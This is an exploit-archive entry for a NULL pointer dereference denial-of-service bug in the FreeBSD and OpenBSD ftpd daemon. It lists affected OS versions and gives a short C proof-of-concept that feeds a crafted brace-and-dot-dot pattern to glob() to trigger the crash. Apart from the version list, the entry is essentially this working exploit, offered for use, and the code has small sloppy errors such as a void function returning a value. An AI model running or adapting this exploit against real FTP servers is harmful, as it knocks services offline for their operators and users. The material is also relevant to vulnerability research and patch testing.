FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference DoS Vulnerability

2010-03-08T00:00:00
ID 1337DAY-ID-11207
Type zdt
Reporter Kingcope
Modified 2010-03-08T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            ===================================================================================
FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability
===================================================================================


Vulnerable: 	OpenBSD OpenBSD 4.6
FreeBSD ftpd 0
FreeBSD FreeBSD 4.9 -RELENG
FreeBSD FreeBSD 4.9 -PRERELEASE
FreeBSD FreeBSD 4.9
FreeBSD FreeBSD 8.0-STABLE
FreeBSD FreeBSD 8.0-RELEASE
FreeBSD FreeBSD 6.3-RELEASE-p11
FreeBSD FreeBSD 6.3-RELEASE-p10
FreeBSD FreeBSD 6.3 -RELENG
FreeBSD FreeBSD 6.3 -RELEASE-p9
FreeBSD FreeBSD 6.3 -RELEASE-p8
FreeBSD FreeBSD 6.3 -RELEASE-p6
FreeBSD FreeBSD 6.3


#include <glob.h>
#include <stdio.h>

#define MAXUSRARGS      100
#define MAXGLOBARGS     1000

void do_glob() {
        glob_t gl;
        char **pop;

        char buffer[256];
        strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");

        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
        memset(&gl, 0, sizeof(gl));
        gl.gl_matchc = MAXGLOBARGS;
        flags |= GLOB_LIMIT;
        if (glob(buffer, flags, NULL, &gl)) {
                printf("GLOB FAILED!\n");
                return 0;
        }
        else
//                for (pop = gl.gl_pathv; pop && *pop && 1 <
(MAXGLOBARGS-1);
                for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
                     pop++) {
                        printf("glob success");
                        return 0;
                }
        globfree(&gl);
}

main(int argc, char **argv) {
        do_glob();
        do_glob();
}




#  0day.today [2018-02-06]  #